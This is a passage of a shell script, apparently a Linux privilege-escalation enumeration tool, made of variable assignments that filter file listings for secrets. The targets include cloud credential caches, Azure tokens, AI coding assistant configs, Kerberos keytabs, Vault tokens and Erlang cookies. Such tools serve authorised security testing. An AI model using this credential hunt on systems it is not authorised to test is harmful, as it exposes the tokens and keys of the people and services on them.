    840   PSTORAGE_SNYK=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "snyk\.json$|snyk\.config\.json$" | sort | uniq | head -n 70)
    841   PSTORAGE_CLOUD_CREDENTIALS=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CDROM\n$FIND_DIR_RUN\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "credentials\.db$|legacy_credentials\.db$|adc\.json$|\.boto$|\.credentials\.json$|firebase-tools\.json$|access_tokens\.db$|access_tokens\.json$|accessTokens\.json$|gcloud$|legacy_credentials$|azureProfile\.json$|TokenCache\.dat$|AzureRMContext\.json$|clouds\.config$|service_principal_entries\.json$|msal_token_cache\.json$|msal_http_cache\.bin$|service_principal_entries\.bin$|msal_token_cache\.bin$|ErrorRecords$|TokenCache\.dat$|\.bluemix$|doctl$|Google Cloud Directory Sync$|Google Password Sync$" | sort | uniq | head -n 70)
    842   PSTORAGE_AI_CODING_ASSISTANTS=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CDROM\n$FIND_DIR_RUN\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E '.*/\.config/gh$|.*/AppData/.*gh$|.*/Library/Application Support/gh$|.*/(Cursor|Code|Code - Insiders)/User/(globalStorage|workspaceStorage)(/.*)?$|.*/Library/Application Support/(Cursor|Code|Code - Insiders)/User/(globalStorage|workspaceStorage)(/.*)?$' | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "\.codex$|\.claude$|\.claude\.json$|\.gemini$|\.cursor$|\.mcp\.json$|gh$|state\.vscdb$|state\.vscdb\.backup$|storage\.json$" | sort | uniq | head -n 70)
    843   PSTORAGE_ROAD_RECON=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "\.roadtools_auth$" | sort | uniq | head -n 70)
    844   PSTORAGE_FREEIPA=$(echo -e "$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CDROM\n$FIND_DIR_RUN\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "ipa$|dirsrv$" | sort | uniq | head -n 70)
    845   PSTORAGE_KERBEROS=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "krb5\.conf$|.*\.keytab$|\.k5login$|krb5cc_.*$|kadm5\.acl$|secrets\.ldb$|\.secrets\.mkey$|sssd\.conf$" | sort | uniq | head -n 70)
    846   PSTORAGE_KIBANA=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "kibana\.y.*ml$" | sort | uniq | head -n 70)
    847   PSTORAGE_GRAFANA=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "grafana\.ini$" | sort | uniq | head -n 70)
    848   PSTORAGE_KNOCKD=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E '/etc/init.d/' | grep -E "^${ROOT_FOLDER}etc" | grep -E ".*knockd.*$" | sort | uniq | head -n 70)
    849   PSTORAGE_LOGSTASH=$(echo -e "$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CDROM\n$FIND_DIR_RUN\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "logstash$" | sort | uniq | head -n 70)
    850   PSTORAGE_ELASTICSEARCH=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "elasticsearch\.y.*ml$" | sort | uniq | head -n 70)
    851   PSTORAGE_VAULT_SSH_HELPER=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "vault-ssh-helper\.hcl$" | sort | uniq | head -n 70)
    852   PSTORAGE_VAULT_SSH_TOKEN=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "\.vault-token$" | sort | uniq | head -n 70)
    853   PSTORAGE_COUCHDB=$(echo -e "$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CDROM\n$FIND_DIR_RUN\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "couchdb$" | sort | uniq | head -n 70)
    854   PSTORAGE_REDIS=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "redis\.conf$" | sort | uniq | head -n 70)
    855   PSTORAGE_MOSQUITTO=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "mosquitto\.conf$" | sort | uniq | head -n 70)
    856   PSTORAGE_NEO4J=$(echo -e "$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CDROM\n$FIND_DIR_RUN\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "neo4j$" | sort | uniq | head -n 70)
    857   PSTORAGE_CLOUD_INIT=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "cloud\.cfg$" | sort | uniq | head -n 70)
    858   PSTORAGE_ERLANG=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "\.erlang\.cookie$" | sort | uniq | head -n 70)
    859   PSTORAGE_SIP=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "sip\.conf$|amportal\.conf$|FreePBX\.conf$|Elastix\.conf$" | sort | uniq | head -n 70)
    860   PSTORAGE_GMV_AUTH=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "gvm-tools\.conf$" | sort | uniq | head -n 70)
